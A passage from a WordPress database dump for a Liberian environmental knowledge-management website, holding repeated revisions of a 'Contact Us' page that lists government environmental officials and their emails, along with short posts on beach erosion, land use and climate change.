Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 21:01:52','2019-11-15 21:01:52','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2371,1,'2019-11-15 21:02:54','2019-11-15 21:02:54','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 21:02:54','2019-11-15 21:02:54','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2372,1,'2019-11-15 21:04:23','2019-11-15 21:04:23','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 21:04:23','2019-11-15 21:04:23','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2373,1,'2019-11-15 21:05:12','2019-11-15 21:05:12','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 21:05:12','2019-11-15 21:05:12','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2374,1,'2019-11-15 21:05:54','2019-11-15 21:05:54','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 21:05:54','2019-11-15 21:05:54','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2375,1,'2019-11-15 21:10:55','2019-11-15 21:10:55','<h2>Contact Us</h2>\nPlease contact the EKMS Team for further information relating to this website.\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:\n\n<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\">\nContact Form Coming up\n<h2>EKMS Knowledge Brokers</h2>\nContact  our knowledge brokers for direct support or response to your questions:\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\">\n<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\">\n<strong>J.S. Datuama Cammue</strong>\nMEAs Officer, EPA\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\nMEAs Coordinator, EPA\nUNFCCC Focal Point\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong>\nGIS Coordinator, EPA\nUNCCD Focal Point\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\">\n<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, Compliance and Enforcement, EPA\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong>\nAssistant Manager, ESIA, EPA\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong>\nEIA Manager, FDA\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\nMarketing and Forest Forecast\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong>\nDirector @ MOA\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong>\nAssistant Minister, MME\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong>\nLand Use Management Manager, LLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong>\nManager, CCCD Project\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 21:10:55','2019-11-15 21:10:55','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2376,1,'2019-11-15 21:34:51','2019-11-15 21:34:51','Beach erosion in elwa, paynesville','Beach Erosion','','publish','closed','open','','beach-erosion','','','2019-11-15 21:34:51','2019-11-15 21:34:51','',0,'https://ekmsliberia.info/?post_type=topic&#038;p=2376',0,'topic','',0),(2377,1,'2019-11-15 21:34:51','2019-11-15 21:34:51','Beach erosion in elwa, paynesville','Beach Erosion','','inherit','closed','closed','','2376-revision-v1','','','2019-11-15 21:34:51','2019-11-15 21:34:51','',2376,'https://ekmsliberia.info/2376-revision-v1/',0,'revision','',0),(2378,1,'2019-11-15 23:15:47','2019-11-15 23:15:47','Land use activities can result in emissions of such greenhouse gases to the atmosphere or removal of greenhouse gases from the atmosphere. The UNFCCC acknowledges that land use can contribute significantly to mitigation of climate change.\n\n, including through the promotion of sustainable management of forests and oceans as well as other terrestrial, coastal and marine ecosystems.','Land Use','','inherit','closed','closed','','1813-autosave-v1','','','2019-11-15 23:15:47','2019-11-15 23:15:47','',1813,'https://ekmsliberia.info/1813-autosave-v1/',0,'revision','',0),(2379,1,'2019-11-15 23:30:08','2019-11-15 23:30:08','','featured_home5','Photo Credit: EPA. The EPA Executive Director Speaking at a Blue Ocean pre-launch ceremony','inherit','open','closed','','featured_home5','','','2019-11-22 23:59:53','2019-11-22 23:59:53','',482,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_home5.jpg',0,'attachment','image/jpeg',0),(2380,1,'2019-11-15 23:38:19','2019-11-15 23:38:19','Climate change presents the single biggest threat to sustainable development everywhere and its widespread, unprecedented impacts disproportionately burden the poorest and most vulnerable. Urgent action to halt climate change and deal with its impacts is integral to successfully achieving all Sustainable Development Goals (SDGs).','Action on Climate Change and Sustainable Development Goals','','inherit','closed','closed','','1807-autosave-v1','','','2019-11-15 23:38:19','2019-11-15 23:38:19','',1807,'https://ekmsliberia.info/1807-autosave-v1/',0,'revision','',0),(2384,1,'2019-11-16 02:09:04','2019-11-16 02:09:04','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n			<a href=\"https://ekms-liberia.mn.co/\" role=\"button\">\n						Join the Community\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-2381\"><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a 